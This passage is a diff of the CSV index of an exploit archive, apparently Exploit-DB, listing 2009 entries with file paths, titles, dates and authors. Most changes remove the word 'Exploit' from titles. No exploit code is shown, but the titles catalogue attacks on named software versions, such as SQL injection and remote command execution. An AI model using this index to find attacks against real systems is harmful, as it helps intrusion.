7748,platforms/windows/remote/7748.html,"Office Viewer ActiveX Control 3.0.1 - (Save) Remote File Overwrite",2009-01-13,Houssamix,windows,remote,0 -7749,platforms/windows/remote/7749.html,"Office Viewer ActiveX Control 3.0.1 - Remote Command Execution Exploit",2009-01-13,Houssamix,windows,remote,0 +7749,platforms/windows/remote/7749.html,"Office Viewer ActiveX Control 3.0.1 - Remote Command Execution",2009-01-13,Houssamix,windows,remote,0 7750,platforms/windows/dos/7750.html,"PowerPoint Viewer OCX 3.1 - Remote File Overwrite",2009-01-13,Stack,windows,dos,0 7751,platforms/windows/dos/7751.pl,"dBpowerAMP Audio Player 2 - '.pls' Local Buffer Overflow (PoC)",2009-01-13,Stack,windows,dos,0 7752,platforms/asp/webapps/7752.txt,"DMXReady News Manager 1.1 - Arbitrary Category Change",2009-01-13,ajann,asp,webapps,0 -7753,platforms/cgi/webapps/7753.pl,"HSPell 1.1 - (cilla.cgi) Remote Command Execution Exploit",2009-01-13,ZeN,cgi,webapps,0 +7753,platforms/cgi/webapps/7753.pl,"HSPell 1.1 - (cilla.cgi) Remote Command Execution",2009-01-13,ZeN,cgi,webapps,0 7754,platforms/asp/webapps/7754.txt,"DMXReady Account List Manager 1.1 - Contents Change",2009-01-13,ajann,asp,webapps,0 -7755,platforms/windows/remote/7755.html,"PowerPoint Viewer OCX 3.1 - Remote Command Execution Exploit",2009-01-13,Cyber-Zone,windows,remote,0 +7755,platforms/windows/remote/7755.html,"PowerPoint Viewer OCX 3.1 - Remote Command Execution",2009-01-13,Cyber-Zone,windows,remote,0 7756,platforms/windows/dos/7756.py,"Nofeel FTP Server 3.6 - (CWD) Remote Memory Consumption Exploit",2009-01-13,His0k4,windows,dos,0 -7757,platforms/windows/remote/7757.html,"Word Viewer OCX 3.2 - Remote Command Execution Exploit",2009-01-13,Stack,windows,remote,0 +7757,platforms/windows/remote/7757.html,"Word Viewer OCX 3.2 - Remote Command Execution",2009-01-13,Stack,windows,remote,0 7758,platforms/php/webapps/7758.txt,"Dark Age CMS 0.2c Beta - (Authentication Bypass) SQL Injection",2009-01-13,darkjoker,php,webapps,0 7759,platforms/php/webapps/7759.txt,"Syzygy CMS 0.3 - (Authentication Bypass) SQL Injection",2009-01-14,darkjoker,php,webapps,0 7760,platforms/multiple/remote/7760.php,"TeamSpeak 2.0.23.17 - Remote File Disclosure",2009-01-14,c411k,multiple,remote,0 7761,platforms/asp/webapps/7761.txt,"netvolution CMS 1.0 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-14,Ellinas,asp,webapps,0 7762,platforms/windows/remote/7762.html,"EDraw Office Viewer 5.4 - HttpDownloadFile() Insecure Method",2009-01-14,Cyber-Zone,windows,remote,0 -7763,platforms/windows/remote/7763.html,"Excel Viewer OCX 3.2 - Remote Command Execution Exploit",2009-01-14,Stack,windows,remote,0 +7763,platforms/windows/remote/7763.html,"Excel Viewer OCX 3.2 - Remote Command Execution",2009-01-14,Stack,windows,remote,0 7764,platforms/php/webapps/7764.txt,"DMXReady Blog Manager 1.1 - Remote File Delete",2009-01-14,ajann,php,webapps,0 7765,platforms/windows/local/7765.py,"OtsTurntables 1.00.027 - '.ofl' Local Stack Overflow",2009-01-14,suN8Hclf,windows,local,0 7766,platforms/asp/webapps/7766.txt,"DMXReady Catalog Manager 1.1 - Remote Contents Change",2009-01-14,ajann,asp,webapps,0 @@ -7319,7 +7320,7 @@ id,file,description,date,author,platform,type,port 7777,platforms/php/webapps/7777.txt,"Joomla Component Fantasytournament - SQL Injection",2009-01-14,H!tm@N,php,webapps,0 7778,platforms/php/webapps/7778.txt,"phpList 2.10.8 - Local File Inclusion",2009-01-14,BugReport.IR,php,webapps,0 7779,platforms/windows/remote/7779.html,"AAA EasyGrid ActiveX 3.51 - Remote File Overwrite",2009-01-14,Houssamix,windows,remote,0 -7780,platforms/php/webapps/7780.pl,"phosheezy 2.0 - Remote Command Execution Exploit",2009-01-14,Osirys,php,webapps,0 +7780,platforms/php/webapps/7780.pl,"phosheezy 2.0 - Remote Command Execution",2009-01-14,Osirys,php,webapps,0 7781,platforms/multiple/remote/7781.txt,"Oracle Secure Backup 10g - exec_qr() Command Injection",2009-01-14,"Joxean Koret",multiple,remote,0 7782,platforms/asp/webapps/7782.txt,"DMXReady PayPal Store Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps,0 7783,platforms/asp/webapps/7783.txt,"DMXReady Photo Gallery Manager 1.1 - Contents Change",2009-01-14,ajann,asp,webapps,0 @@ -7330,7 +7331,7 @@ id,file,description,date,author,platform,type,port 7788,platforms/asp/webapps/7788.txt,"DMXReady BillboardManager 1.1 - Contents Change",2009-01-14,x0r,asp,webapps,0 7789,platforms/asp/webapps/7789.txt,"DMXReady SDK 1.1 - Remote File Download",2009-01-14,ajann,asp,webapps,0 7790,platforms/windows/dos/7790.txt,"netsurf Web browser 1.2 - Multiple Vulnerabilities",2009-01-14,"Jeremy Brown",windows,dos,0 -7791,platforms/asp/webapps/7791.txt,"DMXReady Billboard Manager 1.1 - Remote File Upload",2009-01-15,ajann,asp,webapps,0 +7791,platforms/asp/webapps/7791.txt,"DMXReady Billboard Manager 1.1 - Arbitrary File Upload",2009-01-15,ajann,asp,webapps,0 7792,platforms/php/webapps/7792.txt,"GNUBoard 4.31.03 - (08.12.29) Local File Inclusion",2009-01-15,flyh4t,php,webapps,0 7793,platforms/php/webapps/7793.php,"Joomla com_Eventing 1.6.x - Blind SQL Injection",2009-01-15,InjEctOr5,php,webapps,0 7794,platforms/windows/remote/7794.html,"Ciansoft PDFBuilderX 2.2 - ActiveX Arbitrary File Overwrite",2009-01-15,"Alfons Luja",windows,remote,0 @@ -7359,12 +7360,12 @@ id,file,description,date,author,platform,type,port 7818,platforms/php/webapps/7818.txt,"SCMS 1 - 'index.php p' Local File Inclusion",2009-01-18,ahmadbady,php,webapps,0 7819,platforms/php/webapps/7819.txt,"ESPG (Enhanced Simple PHP Gallery) 1.72 - File Disclosure",2009-01-18,bd0rk,php,webapps,0 7820,platforms/php/webapps/7820.pl,"Fhimage 1.2.1 - Remote Index Change Exploit",2009-01-19,Osirys,php,webapps,0 -7821,platforms/php/webapps/7821.pl,"Fhimage 1.2.1 - Remote Command Execution Exploit (mq = off)",2009-01-19,Osirys,php,webapps,0 +7821,platforms/php/webapps/7821.pl,"Fhimage 1.2.1 - Remote Command Execution (mq = off)",2009-01-19,Osirys,php,webapps,0 7822,platforms/multiple/dos/7822.c,"D-Bus Daemon < 1.2.4 - (libdbus) Denial of Service",2009-01-19,"Jon Oberheide",multiple,dos,0 7823,platforms/qnx/dos/7823.txt,"QNX 6.4.0 - bitflipped elf binary 'id' Kernel Panic Exploit",2009-01-19,kokanin,qnx,dos,0 7824,platforms/php/webapps/7824.pl,"Joomla com_pccookbook - (recipe_id) Blind SQL Injection",2009-01-19,InjEctOr5,php,webapps,0 7826,platforms/windows/remote/7826.html,"SmartVmd ActiveX 1.1 - Remote File Overwrite",2009-01-19,Houssamix,windows,remote,0 -7827,platforms/windows/remote/7827.html,"SmartVmd ActiveX 1.1 - Remote File Deletion Exploit",2009-01-19,Houssamix,windows,remote,0 +7827,platforms/windows/remote/7827.html,"SmartVmd ActiveX 1.1 - Remote File Deletion",2009-01-19,Houssamix,windows,remote,0 7828,platforms/php/webapps/7828.txt,"Joomla Component com_news - SQL Injection",2009-01-19,snakespc,php,webapps,0 7829,platforms/php/webapps/7829.txt,"Gallery Kys 1.0 - Admin Password Disclosure / Permanent Cross-Site Scripting",2009-01-19,Osirys,php,webapps,0 7830,platforms/php/webapps/7830.txt,"RCBlog 1.03 - Authentication Bypass",2009-01-19,"Danny Moules",php,webapps,0 @@ -7374,14 +7375,14 @@ id,file,description,date,author,platform,type,port 7834,platforms/php/webapps/7834.txt,"Ninja Blog 4.8 - (Cross-Site Request Forgery/HTML Injection)",2009-01-19,"Danny Moules",php,webapps,0 7835,platforms/php/webapps/7835.htm,"Max.Blog 1.0.6 - Arbitrary Delete Post Exploit",2009-01-20,SirGod,php,webapps,0 7836,platforms/php/webapps/7836.txt,"AJ Auction Pro OOPD 2.3 - 'id' SQL Injection",2009-01-20,snakespc,php,webapps,0 -7837,platforms/php/webapps/7837.pl,"LinPHA Photo Gallery 2.0 - Remote Command Execution Exploit",2009-01-20,Osirys,php,webapps,0 +7837,platforms/php/webapps/7837.pl,"LinPHA Photo Gallery 2.0 - Remote Command Execution",2009-01-20,Osirys,php,webapps,0 7838,platforms/php/webapps/7838.txt,"Dodo's Quiz Script 1.1 - (dodosquiz.php) Local File Inclusion",2009-01-20,Stack,php,webapps,0 7839,platforms/windows/local/7839.py,"Total Video Player 1.31 - (DefaultSkin.ini) Local Stack Overflow",2009-01-20,His0k4,windows,local,0 7840,platforms/php/webapps/7840.pl,"Joomla Com BazaarBuilder Shopping Cart 5.0 - SQL Injection",2009-01-21,XaDoS,php,webapps,0 7841,platforms/php/webapps/7841.txt,"Mambo Component SOBI2 RC 2.8.2 - (bid) SQL Injection",2009-01-21,"Br1ght D@rk",php,webapps,0 7842,platforms/windows/remote/7842.html,"Firefox 3.0.5 - Status Bar Obfuscation / Clickjacking",2009-01-21,MrDoug,windows,remote,0 7843,platforms/windows/local/7843.c,"Browser3D 3.5 - '.sfs' Local Stack Overflow (C)",2009-01-22,SimO-s0fT,windows,local,0 -7844,platforms/php/webapps/7844.py,"Sad Raven's Click Counter 1.0 - passwd.dat Disclosure Exploit",2009-01-21,Pouya_Server,php,webapps,0 +7844,platforms/php/webapps/7844.py,"Sad Raven's Click Counter 1.0 - passwd.dat Disclosure",2009-01-21,Pouya_Server,php,webapps,0 7845,platforms/hardware/remote/7845.txt,"AXIS 70U - Network Document Server Privilege Escalation / Cross-Site Scripting",2009-01-21,DSecRG,hardware,remote,0 7846,platforms/php/webapps/7846.php,"Joomla com_pcchess - (game_id) Blind SQL Injection",2009-01-21,InjEctOr5,php,webapps,0 7847,platforms/php/webapps/7847.txt,"Joomla Component beamospetition 1.0.12 - SQL Injection / Cross-Site Scripting",2009-01-21,vds_s,php,webapps,0 @@ -7395,24 +7396,24 @@ id,file,description,date,author,platform,type,port 7855,platforms/linux/local/7855.txt,"PostgreSQL 8.2/8.3/8.4 - UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0 7856,platforms/linux/local/7856.txt,"MySQL 4/5/6 - UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0 7857,platforms/windows/dos/7857.pl,"Merak Media Player 3.2 - '.m3u' File Local Buffer Overflow (PoC)",2009-01-25,Houssamix,windows,dos,0 -7858,platforms/hardware/remote/7858.php,"Siemens ADSL SL2-141 - Cross-Site Request Forgery Exploit",2009-01-25,spdr,hardware,remote,0 +7858,platforms/hardware/remote/7858.php,"Siemens ADSL SL2-141 - Cross-Site Request Forgery",2009-01-25,spdr,hardware,remote,0 7859,platforms/php/webapps/7859.pl,"MemHT Portal 4.0.1 - (avatar) Remote Code Execution",2009-01-25,StAkeR,php,webapps,0 7860,platforms/php/webapps/7860.php,"Mambo com_sim 0.8 - Blind SQL Injection",2009-01-25,"Mehmet Ince",php,webapps,0 7861,platforms/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 - (Authentication Bypass) SQL Injection",2009-01-25,ByALBAYX,asp,webapps,0 7862,platforms/php/webapps/7862.txt,"Flax Article Manager 1.1 - 'cat_id' SQL Injection",2009-01-25,JIKO,php,webapps,0 7863,platforms/php/webapps/7863.txt,"OpenGoo 1.1 - (script_class) Local File Inclusion",2009-01-25,fuzion,php,webapps,0 -7864,platforms/php/webapps/7864.py,"EPOLL SYSTEM 3.1 - (Password.dat) Disclosure Exploit",2009-01-25,Pouya_Server,php,webapps,0 -7865,platforms/solaris/dos/7865.c,"SunOS Release 5.11 snv_101b - Remote IPv6 Crash Exploit",2009-01-26,kingcope,solaris,dos,0 +7864,platforms/php/webapps/7864.py,"EPOLL SYSTEM 3.1 - (Password.dat) Disclosure",2009-01-25,Pouya_Server,php,webapps,0 +7865,platforms/solaris/dos/7865.c,"SunOS Release 5.11 snv_101b - Remote IPv6 Crash",2009-01-26,kingcope,solaris,dos,0 7866,platforms/php/webapps/7866.txt,"Simple Machines Forum 1.1.7 - Cross-Site Request Forgery / Cross-Site Scripting / Package Upload",2009-01-26,Xianur0,php,webapps,0 7867,platforms/php/webapps/7867.php,"ITLPoll 2.7 Stable2 - (index.php id) Blind SQL Injection",2009-01-26,fuzion,php,webapps,0 7868,platforms/windows/remote/7868.html,"FlexCell Grid Control 5.6.9 - Remote File Overwrite",2009-01-26,Houssamix,windows,remote,0 7869,platforms/windows/dos/7869.html,"MW6 Barcode ActiveX - (Barcode.dll) Remote Heap Overflow (PoC)",2009-01-26,Houssamix,windows,dos,0 -7871,platforms/windows/remote/7871.html,"NCTVideoStudio ActiveX DLLs 1.6 - Insecure Method File Creation Exploit",2009-01-26,Stack,windows,remote,0 +7871,platforms/windows/remote/7871.html,"NCTVideoStudio ActiveX DLLs 1.6 - Insecure Method File Creation",2009-01-26,Stack,windows,remote,0 7872,platforms/asp/webapps/7872.txt,"E-ShopSystem - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities",2009-01-26,InjEctOr5,asp,webapps,0 7873,platforms/php/webapps/7873.txt,"Script Toko Online 5.01 - (shop_display_products.php) SQL Injection",2009-01-26,k1n9k0ng,php,webapps,0 7874,platforms/php/webapps/7874.txt,"SHOP-INET 4 - 'show_cat2.php grid' SQL Injection",2009-01-26,FeDeReR,php,webapps,0 7875,platforms/windows/remote/7875.pl,"WinFTP 2.3.0 - 'LIST' Post-Authentication Remote Buffer Overflow",2009-01-26,"joe walko",windows,remote,21 -7876,platforms/php/webapps/7876.php,"PHP-CMS 1 - 'username' Blind SQL Injection",2009-01-26,darkjoker,php,webapps,0 +7876,platforms/php/webapps/7876.php,"PHP-CMS 1 - ''Username'' Blind SQL Injection",2009-01-26,darkjoker,php,webapps,0 7877,platforms/php/webapps/7877.txt,"Wazzum Dating Software - (userid) SQL Injection",2009-01-26,nuclear,php,webapps,0 7878,platforms/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php cat' SQL Injection",2009-01-26,nuclear,php,webapps,0 7879,platforms/php/webapps/7879.pl,"SiteXS 0.1.1 - (type) Local File Inclusion",2009-01-26,darkjoker,php,webapps,0 @@ -7429,7 +7430,7 @@ id,file,description,date,author,platform,type,port 7890,platforms/windows/dos/7890.pl,"Zinf Audio Player 2.2.1 - '.gqmpeg' Buffer Overflow (PoC)",2009-01-27,Hakxer,windows,dos,0 7892,platforms/php/webapps/7892.php,"Community CMS 0.4 - (/index.php id) Blind SQL Injection",2009-01-28,darkjoker,php,webapps,0 7893,platforms/php/webapps/7893.txt,"gamescript 4.6 - (Cross-Site Scripting / SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2009-01-28,"Encrypt3d.M!nd ",php,webapps,0 -7894,platforms/php/webapps/7894.txt,"Chipmunk Blog - (Authentication Bypass) Add Admin Exploit",2009-01-28,x0r,php,webapps,0 +7894,platforms/php/webapps/7894.txt,"Chipmunk Blog - (Authentication Bypass) Add Admin",2009-01-28,x0r,php,webapps,0 7895,platforms/php/webapps/7895.txt,"Gazelle CMS - 'template' Local File Inclusion",2009-01-28,fuzion,php,webapps,0 7896,platforms/php/webapps/7896.php,"Lore 1.5.6 - 'article.php' Blind SQL Injection",2009-01-28,OzX,php,webapps,0 7897,platforms/php/webapps/7897.php,"phpList 2.10.x - (Remote Code Execution by environ Inclusion) Local File Inclusion",2009-01-28,mozi,php,webapps,0 @@ -7440,34 +7441,34 @@ id,file,description,date,author,platform,type,port 7902,platforms/windows/dos/7902.txt,"Amaya Web Editor - XML and HTML parser Vulnerabilities",2009-01-28,"Core Security",windows,dos,0 7903,platforms/windows/remote/7903.html,"Google Chrome 1.0.154.43 - Clickjacking",2009-01-28,x0x,windows,remote,0 7904,platforms/windows/dos/7904.pl,"Thomson mp3PRO Player/Encoder - '.m3u' Crash (PoC)",2009-01-29,Hakxer,windows,dos,0 -7905,platforms/php/webapps/7905.pl,"Personal Site Manager 0.3 - Remote Command Execution Exploit",2009-01-29,darkjoker,php,webapps,0 +7905,platforms/php/webapps/7905.pl,"Personal Site Manager 0.3 - Remote Command Execution",2009-01-29,darkjoker,php,webapps,0 7906,platforms/windows/dos/7906.pl,"Amaya Web Editor 11.0 - Remote Buffer Overflow (PoC)",2009-01-29,Stack,windows,dos,0 7908,platforms/php/webapps/7908.txt,"Star Articles 6.0 - (admin.manage) Remote Contents Change",2009-01-29,ByALBAYX,php,webapps,0 7909,platforms/php/webapps/7909.txt,"Coppermine Photo Gallery 1.4.19 - Remote PHP File Upload",2009-01-29,"Michael Brooks",php,webapps,0 7910,platforms/windows/remote/7910.html,"WOW Web On Windows ActiveX Control 2 - Remote Code Execution",2009-01-29,"Michael Brooks",windows,remote,0 7911,platforms/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple SQL Injections Vulnerabilities",2009-01-29,Zigma,php,webapps,0 7912,platforms/windows/remote/7912.txt,"Microsoft Internet Explorer 7 - Clickjacking",2009-01-29,UzmiX,windows,remote,0 -7913,platforms/windows/remote/7913.pl,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow Exploit",2009-01-29,SkD,windows,remote,21 +7913,platforms/windows/remote/7913.pl,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow",2009-01-29,SkD,windows,remote,21 7915,platforms/hardware/remote/7915.txt,"Motorola Wimax modem CPEi300 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2009-01-29,"Usman Saeed",hardware,remote,0 7916,platforms/php/webapps/7916.txt,"Netartmedia Car Portal 1.0 - (Authentication Bypass) SQL Injection",2009-01-29,"Mehmet Ince",php,webapps,0 7917,platforms/php/webapps/7917.php,"PLE CMS 1.0 Beta 4.2 - (login.php school) Blind SQL Injection",2009-01-29,darkjoker,php,webapps,0 7918,platforms/windows/remote/7918.txt,"ManageEngine Firewall Analyzer 5 - Cross-Site Request Forgery / Cross-Site Scripting",2009-01-29,"Michael Brooks",windows,remote,0 7919,platforms/windows/remote/7919.txt,"Profense Web Application Firewall 2.6.2 - Cross-Site Request Forgery / Cross-Site Scripting",2009-01-29,"Michael Brooks",windows,remote,0 7920,platforms/hardware/remote/7920.txt,"D-Link VoIP Phone Adapter - Cross-Site Scripting / Cross-Site Request Forgery Remote Firmware Overwrite",2009-01-29,"Michael Brooks",hardware,remote,0 -7921,platforms/hardware/remote/7921.txt,"Zoom VoIP Phone Adapater ATA1+1 1.2.5 - Cross-Site Request Forgery Exploit",2009-01-29,"Michael Brooks",hardware,remote,0 +7921,platforms/hardware/remote/7921.txt,"Zoom VoIP Phone Adapater ATA1+1 1.2.5 - Cross-Site Request Forgery",2009-01-29,"Michael Brooks",hardware,remote,0 7922,platforms/php/webapps/7922.txt,"Pligg 9.9.5 - Cross-Site Request Forgery Protection Bypass / Captcha Bypass",2009-01-29,"Michael Brooks",php,webapps,0 7923,platforms/windows/local/7923.c,"Total Video Player 1.3.7 - '.m3u' Local Buffer Overflow",2009-01-29,SimO-s0fT,windows,local,0 7924,platforms/asp/webapps/7924.txt,"SalesCart - (Authentication Bypass) SQL Injection",2009-01-30,ByALBAYX,asp,webapps,0 7925,platforms/php/webapps/7925.txt,"revou twitter clone - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-30,nuclear,php,webapps,0 -7926,platforms/windows/remote/7926.pl,"Amaya Web Editor 11 - Remote SEH Overwrite",2009-01-30,LiquidWorm,windows,remote,0 +7926,platforms/windows/remote/7926.pl,"Amaya Web Editor 11 - Remote Overwrite (SEH)",2009-01-30,LiquidWorm,windows,remote,0 7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 - (09.01.30) Multiple Local+Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0 -7928,platforms/windows/remote/7928.txt,"Synactis All_IN_THE_BOX ActiveX 3.0 - Null byte File Overwrite",2009-01-30,DSecRG,windows,remote,0 +7928,platforms/windows/remote/7928.txt,"Synactis All_IN_THE_BOX ActiveX 3.0 - Null Byte File Overwrite",2009-01-30,DSecRG,windows,remote,0 7929,platforms/windows/local/7929.c,"GOM Player 2.0.12 - '.pls' Universal Buffer Overflow",2009-01-30,Stack,windows,local,0 7930,platforms/php/webapps/7930.txt,"bpautosales 1.0.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2009-01-30,"Mehmet Ince",php,webapps,0 7931,platforms/php/webapps/7931.txt,"Orca 2.0.2 - (Topic) Remote Cross-Site Scripting",2009-01-30,J-Hacker,php,webapps,0 7932,platforms/php/webapps/7932.txt,"SkaLinks 1.5 - (Authentication Bypass) SQL Injection",2009-01-30,Dimi4,php,webapps,0 7933,platforms/php/webapps/7933.txt,"eVision CMS 2.0 - (field) SQL Injection",2009-01-30,darkjoker,php,webapps,0 -7934,platforms/windows/dos/7934.py,"Spider Player 2.3.9.5 - '.asx' Off-by-One Crash Exploit",2009-01-30,Houssamix,windows,dos,0 +7934,platforms/windows/dos/7934.py,"Spider Player 2.3.9.5 - '.asx' Off-by-One Crash",2009-01-30,Houssamix,windows,dos,0 7935,platforms/windows/remote/7935.html,"Google Chrome 1.0.154.46 - (ChromeHTML://) Parameter Injection (PoC)",2009-01-30,waraxe,windows,remote,0 7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-02-02,ahmadbady,php,webapps,0 7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 - (Job fields) Cross-Site Scripting / Iframe Injection (PoC)",2009-02-02,"Alfons Luja",php,webapps,0 @@ -7477,7 +7478,7 @@ id,file,description,date,author,platform,type,port 7942,platforms/windows/dos/7942.pl,"Elecard AVC HD PLAYER - '.m3u' / '.xpl' Local Stack Overflow (PoC)",2009-02-02,AlpHaNiX,windows,dos,0 7943,platforms/windows/dos/7943.py,"RealVNC 4.1.2 - (vncviewer.exe) RFB Protocol Remote Code Execution (PoC)",2009-02-02,"Andres Luksenberg",windows,dos,0 7944,platforms/php/webapps/7944.php,"phpBLASTER 1.0 RC1 - (blaster_user) Blind SQL Injection",2009-02-02,darkjoker,php,webapps,0 -7945,platforms/php/webapps/7945.php,"CMS Mini 0.2.2 - Remote Command Execution Exploit",2009-02-02,darkjoker,php,webapps,0 +7945,platforms/php/webapps/7945.php,"CMS Mini 0.2.2 - Remote Command Execution",2009-02-02,darkjoker,php,webapps,0 7946,platforms/php/webapps/7946.txt,"sourdough 0.3.5 - Remote File Inclusion",2009-02-02,ahmadbady,php,webapps,0 7947,platforms/php/webapps/7947.pl,"eVision CMS 2.0 - Remote Code Execution",2009-02-02,Osirys,php,webapps,0 7948,platforms/php/webapps/7948.php,"phpslash 0.8.1.1 - Remote Code Execution",2009-02-02,DarkFig,php,webapps,0 @@ -7489,7 +7490,7 @@ id,file,description,date,author,platform,type,port 7954,platforms/php/webapps/7954.txt,"groone glinks 2.1 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps,0 7955,platforms/php/webapps/7955.txt,"groone's Guestbook 2.0 - Remote File Inclusion",2009-02-03,"k3vin mitnick",php,webapps,0 7956,platforms/php/webapps/7956.txt,"Online Grades 3.2.4 - (Authentication Bypass) SQL Injection",2009-02-03,x0r,php,webapps,0 -7957,platforms/windows/local/7957.pl,"Free Download Manager 3.0 Build 844 - '.torrent' Buffer Overflow Exploit",2009-02-03,SkD,windows,local,0 +7957,platforms/windows/local/7957.pl,"Free Download Manager 3.0 Build 844 - '.torrent' Buffer Overflow",2009-02-03,SkD,windows,local,0 7958,platforms/windows/local/7958.pl,"Euphonics Audio Player 1.0 - '.pls' Local Buffer Overflow",2009-02-03,h4ck3r#47,windows,local,0 7959,platforms/php/webapps/7959.txt,"Simple Machines Forums - (BBCode) Cookie Stealing",2009-02-03,Xianur0,php,webapps,0 7960,platforms/php/webapps/7960.txt,"AJA Modules Rapidshare 1.0.0 - Arbitrary File Upload",2009-02-03,"Hussin X",php,webapps,0 @@ -7499,7 +7500,7 @@ id,file,description,date,author,platform,type,port 7964,platforms/php/webapps/7964.txt,"4Site CMS 2.6 - Multiple SQL Injections",2009-02-03,D.Mortalov,php,webapps,0 7965,platforms/php/webapps/7965.txt,"technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps,0 7966,platforms/windows/remote/7966.txt,"navicopa WebServer 3.0.1 - (Buffer Overflow / Script Source Disclosure) Multiple Vulnerabilities",2009-02-03,e.wiZz!,windows,remote,0 -7967,platforms/php/webapps/7967.pl,"TxtBlog 1.0 Alpha - Remote Command Execution Exploit",2009-02-03,Osirys,php,webapps,0 +7967,platforms/php/webapps/7967.pl,"TxtBlog 1.0 Alpha - Remote Command Execution",2009-02-03,Osirys,php,webapps,0 7968,platforms/php/webapps/7968.php,"DreamPics Photo/Video Gallery - Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0 7969,platforms/php/webapps/7969.txt,"flatnux 2009-01-27 - Remote File Inclusion",2009-02-03,"Alfons Luja",php,webapps,0 7972,platforms/php/webapps/7972.py,"OpenFiler 2.3 - (Authentication Bypass) Remote Password Change Exploit",2009-02-03,nonroot,php,webapps,0 @@ -7516,26 +7517,26 @@ id,file,description,date,author,platform,type,port 7984,platforms/php/webapps/7984.pl,"YapBB 1.2 - (forumID) Blind SQL Injection",2009-02-04,darkjoker,php,webapps,0 7985,platforms/windows/dos/7985.pl,"Novell Groupwise 8.0 - Malformed RCPT command Off-by-One Exploit",2009-02-04,"Praveen Darshanam",windows,dos,0 7986,platforms/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 - (Authorization) Stack Buffer Overflow (PoC)",2009-02-04,"Praveen Darshanam",windows,dos,0 -7987,platforms/php/webapps/7987.txt,"gr blog 1.1.4 - (File Upload / Authentication Bypass) Multiple Vulnerabilities",2009-02-04,JosS,php,webapps,0 +7987,platforms/php/webapps/7987.txt,"gr blog 1.1.4 - (Arbitrary File Upload / Authentication Bypass) Multiple Vulnerabilities",2009-02-04,JosS,php,webapps,0 7988,platforms/windows/remote/7988.pl,"Amaya Web Browser 11 - (bdo tag) Remote Stack Overflow (Windows XP)",2009-02-04,"Rob Carter",windows,remote,0 7989,platforms/windows/remote/7989.pl,"Amaya Web Browser 11 - (bdo tag) Remote Stack Overflow (Windows Vista)",2009-02-04,"Rob Carter",windows,remote,0 7990,platforms/windows/dos/7990.py,"UltraVNC/TightVNC - Multiple VNC Clients Multiple Integer Overflow (PoC)",2009-02-04,"Andres Luksenberg",windows,dos,0 7991,platforms/asp/webapps/7991.txt,"GR Note 0.94 Beta - (Authentication Bypass) Remote Database Backup",2009-02-04,JosS,asp,webapps,0 7992,platforms/php/webapps/7992.txt,"ClearBudget 0.6.1 - Insecure Cookie Handling / Local File Inclusion",2009-02-05,SirGod,php,webapps,0 7993,platforms/php/webapps/7993.txt,"Kipper 2.01 - (Cross-Site Scripting / Local File Inclusion / File Disclosure) Multiple Vulnerabilities",2009-02-05,RoMaNcYxHaCkEr,php,webapps,0 -7994,platforms/windows/local/7994.c,"dBpowerAMP Audio Player 2 - '.pls' Local Buffer Overflow Exploit",2009-02-05,SimO-s0fT,windows,local,0 +7994,platforms/windows/local/7994.c,"dBpowerAMP Audio Player 2 - '.pls' Local Buffer Overflow",2009-02-05,SimO-s0fT,windows,local,0 7995,platforms/windows/dos/7995.pl,"FeedMon 2.7.0.0 - outline Tag Buffer Overflow (PoC)",2009-02-05,"Praveen Darshanam",windows,dos,0 7996,platforms/php/webapps/7996.txt,"ClearBudget 0.6.1 - (Misspelled htaccess) Insecure DD",2009-02-05,Room-Hacker,php,webapps,0 7997,platforms/php/webapps/7997.htm,"txtBB 1.0 RC3 HTML/JS Injection - Add Admin Privileges Exploit",2009-02-05,cOndemned,php,webapps,0 7998,platforms/php/webapps/7998.txt,"WikkiTikkiTavi 1.11 - Remote PHP File Upload",2009-02-06,ByALBAYX,php,webapps,0 -7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution Exploit",2009-02-06,Osirys,php,webapps,0 +7999,platforms/php/webapps/7999.pl,"Simple PHP News 1.0 - Remote Command Execution",2009-02-06,Osirys,php,webapps,0 8000,platforms/php/webapps/8000.txt,"Zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities",2009-02-06,make0day,php,webapps,0 8001,platforms/php/webapps/8001.txt,"Mailist 3.0 - Insecure Backup / Local File Inclusion",2009-02-06,SirGod,php,webapps,0 8002,platforms/php/webapps/8002.txt,"CafeEngine - 'index.php catid' SQL Injection",2009-02-06,SuNHouSe2,php,webapps,0 8003,platforms/php/webapps/8003.pl,"1024 CMS 1.4.4 - Remote Command Execution with Remote File Inclusion (c99) Exploit",2009-02-06,JosS,php,webapps,0 8004,platforms/php/webapps/8004.txt,"SilverNews 2.04 - (Authentication Bypass / Local File Inclusion / Remote Code Execution) Multiple Vulnerabilities",2009-02-06,x0r,php,webapps,0 8005,platforms/php/webapps/8005.txt,"phpYabs 0.1.2 - (Azione) Remote File Inclusion",2009-02-06,Arka69,php,webapps,0 -8006,platforms/php/webapps/8006.txt,"Traidnt UP 1.0 - Remote File Upload",2009-02-09,fantastic,php,webapps,0 +8006,platforms/php/webapps/8006.txt,"Traidnt UP 1.0 - Arbitrary File Upload",2009-02-09,fantastic,php,webapps,0 8007,platforms/php/webapps/8007.php,"IF-CMS 2.0 - (frame.php id) Blind SQL Injection",2009-02-09,darkjoker,php,webapps,0 8008,platforms/hardware/dos/8008.txt,"Netgear embedded Linux for the SSL312 router - Denial of Service",2009-02-09,Rembrandt,hardware,dos,0 8009,platforms/php/webapps/8009.pl,"w3bcms 3.5.0 - 